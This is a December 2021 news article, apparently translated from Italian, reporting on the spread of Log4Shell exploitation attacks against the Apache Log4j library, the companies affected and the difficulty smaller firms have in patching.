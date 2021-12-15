from Federico Cella and Alessio Lana

The Italian Cybersecurity Agency defines the situation as “particularly serious” and many companies do not know how to run for cover

Since we wrote about Log4Shell, the vulnerability contained in the Log4J program, there have been over 800,000 hacker attacks that have exploited this weakness in a open source software that is among the cornerstones of many websites and in general of Network services. Distributed free of charge by the Apache Software Foundation, Log4j is a library that allows developers to create logs, or to record system activities so as to intervene when needed. In a word, it is everywhere.

Security experts don’t use half words. The Italian Cybersecurity Agency speaks of “a vast and diversified attack surface over the entire network”, defining the situation as “particularly serious” while phrases such as “Worst vulnerability ever recorded” or “design error of catastrophic proportions” follow one another relentlessly. Everyone, more or less, is in it. From Apple to Amazon via LinkedIn, Cloudflare, Ibm, Twitter and Tesla the list of companies that use or have used Log4j continues to grow.

Discovered in late November by a researcher from Alibaba, the Chinese e-commerce and cloud giant, the flaw is simple to exploit but virulent. It allows you to send a string of code to others’ servers and then execute it remotely. Criminals could then use it to spread malware, steal data, or control the entire system.

The first major attack involved Minecraft, or rather Minecraft Java Edition (Here we explain how to solve the problem). Several players have started sending code strings on the chat trying to exploit the flaw. Then it was Twitter’s turn with some users putting strings of characters in place of the name. Then there are those who have changed the name of their iPhone. So many tests that show how many are moving to understand how to enter through that door that looks more and more like a door. The growth is exponential: 40,000 were registered on 11 December; December 12, 200,000, December 13, 840,000. According to Akamai, it has now reached 250,000 an hour.

Having made the flaw public allowed it to be addressed more quickly but it also activated the cybercriminals. Understanding its scope, at the moment, is impossible: Apache itself says that Log4j is so present in so many software that it cannot be traced. The only certainty is the confirmation given by this emergency of how the structure of the world network is shaky. Because it has been stratified without a single project over the years, basing part of its protocols on many small software, perhaps years old and developed so that they work – and do – without particular attention to security. A theme that is now increasingly fundamental but which years ago was not listed among the priorities. It is said in these cases of giants with feet of clay.

In the last few days, a kind of global guard and thieves has been triggered. On the one hand, there are criminals who are trying to exploit the flaw, on the other, companies running for cover. But it’s not that easy. The larger and better equipped companies are already distributing patches, of the correctors that should at least stem the loss and the Dutch security agency has released the list of all the software in danger.

Thousands of other small businesses, however, are unable to intervene. “Due to the way this library is used by the most diverse software, it is not easy for a user to understand whether the software he is using uses this library or not», Says Nicholas Luedtke, Principal Analyst of Mandiant,« If you can’t get rid of this doubt quickly, then it becomes really difficult to be able to apply mitigations ». Meanwhile, the race against time continues and the effects of the attacks will only be clear in the next few days.